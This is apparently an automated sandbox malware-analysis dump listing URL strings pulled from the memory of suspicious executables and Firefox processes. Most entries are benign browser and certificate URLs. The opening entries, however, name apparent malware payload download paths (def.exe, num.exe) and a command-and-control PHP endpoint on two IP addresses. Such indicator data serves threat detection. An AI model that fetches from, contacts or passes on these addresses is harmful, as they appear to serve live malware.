Source: file.exe, 00000000.00000003.1844921816.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1845532345.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1845244184.00000000011CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeG
Source: 6cadd3f0fd.exe, 00000009.00000003.2732085528.0000000000793000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exec
Source: 6cadd3f0fd.exe, 00000009.00000003.2731093184.0000000000778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exee
Source: 6cadd3f0fd.exe, 00000009.00000003.2731093184.0000000000778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exee;
Source: skotes.exe, 00000008.00000003.2586871120.0000000000D14000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/test/num.exe
Source: skotes.exe, 00000008.00000003.2586871120.0000000000D14000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/test/num.exe.phpe
Source: skotes.exe, 00000008.00000003.2586871120.0000000000D14000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/test/num.exeage.dll
Source: skotes.exe, 00000008.00000003.2586871120.0000000000D14000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/test/num.exersion
Source: 6cadd3f0fd.exe, 00000009.00000003.2731093184.0000000000778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/~
Source: 1171a5b648.exe, 0000001F.00000002.2692045054.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001C.00000002.2611179744.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001C.00000002.2611179744.0000000001642000.00000004.00000020.00020000.00000000.sdmp, 1171a5b648.exe, 0000001F.00000002.2692045054.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 1171a5b648.exe, 0000001F.00000002.2692045054.00000000011E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: 1171a5b648.exe, 0000001F.00000002.2692045054.00000000011E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/;
Source: num.exe, 0000001C.00000002.2611179744.0000000001642000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/V#
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/u
Source: num.exe, 0000001C.00000002.2611179744.0000000001642000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php3
Source: 1171a5b648.exe, 0000001F.00000002.2692045054.00000000011E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php:
Source: num.exe, 0000001C.00000002.2611179744.0000000001642000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php?
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpGY
Source: num.exe, 0000001C.00000002.2611179744.0000000001642000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php_#
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpcY
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phps
Source: 1171a5b648.exe, 0000001F.00000002.2692045054.00000000011E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/C:
Source: num.exe, 0000001C.00000002.2611179744.0000000001642000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/H#)f
Source: 1171a5b648.exe, 0000001F.00000002.2692045054.00000000011E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/_
Source: num.exe, 0000001C.00000002.2611179744.0000000001642000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/b
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/l
Source: 1171a5b648.exe, 0000000A.00000002.2531875867.0000000000F91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001B.00000002.2742669039.000001C17097D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s_finalizeInternal/this._finalizePromise
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: file.exe, 00000000.00000003.1784302750.00000000011B2000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2557705533.0000000000732000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2689945232.000000000109D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001B.00000002.2749174259.000001C17191A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001B.00000002.2744766730.000001C170CF6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001B.00000002.2744766730.000001C170CF6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 0000001B.00000002.2736051759.000001C170326000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001B.00000002.2736051759.000001C170347000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 0000001B.00000002.2736051759.000001C170326000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001B.00000002.2736051759.000001C170347000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 0000001B.00000002.2736051759.000001C170326000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001B.00000002.2733122243.000001C164C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/stringsd
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#-
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2706509411.000001C17EDBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabled
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledtoolkit.scrollbox.scrollIncrement
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledtoolkit.scrollbox.scrollIncrementtoolkit.scrollbox.c
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/experimentType
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/exposureResults
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/mdnFeatureGate
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariation
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataType
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsEnabled
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 0000001B.00000003.2678449963.000001C178050000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2679591143.000001C177458000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2678449963.000001C17807F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2679591143.000001C177443000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2679591143.000001C177462000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2678449963.000001C1780B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2678449963.000001C1780B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2774091351.000001C174804000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2678449963.000001C178069000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2771686385.000001C1746CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2784200598.000001C17503B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171944000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2774091351.000001C17483B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2678449963.000001C178070000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2778187093.000001C174C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2774091351.000001C174807000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2697397677.000001C175776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2607713680.000001C1746DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2678449963.000001C178039000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2603876915.000001C175780000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001B.00000002.2742669039.000001C17097D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%shttp://compose.mail.yahoo.co.jp/ym/Compose?To=%s_finalizeInter
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001B.00000002.2749174259.000001C17196C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 0000001B.00000003.2679591143.000001C177462000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 0000001B.00000002.2749174259.000001C17196C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2679591143.000001C177462000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 0000001B.00000002.2742669039.000001C17097D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sextractScheme/fixupChangedProtocol
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001B.00000002.2742669039.000001C17097D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2681293561.000001C175654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001B.00000002.2778187093.000001C174C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulCan
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://browser/content/places/browser
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/autoco
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/moz-in
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/shopping/Shoppi
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xuldedupeLogins/shouldReplaceExisting:
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xuloncommand=closebuttoncommand
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/BrowserSearchTeleme
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/PartnerLinkAttribut
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/sessionstore/Sessio
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://activity-stream/lib/ASRouter
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/ExtensionSearchH
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/PrivateBrowsingU
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulsrc=image
Source: firefox.exe, 00000020.00000002.2730820212.000002B797CFD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2676983185.000002B797CFD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2681525052.000002B797CFD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2675377551.000002B797CFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.videolan.org/x264.html
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://youtube.com/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001B.00000003.2598025300.000001C174877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2762165135.000001C1731A0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597108445.000001C17481F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597604309.000001C17485A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597314679.000001C17483C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2596897657.000001C174600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/initializeAttributeInheritance
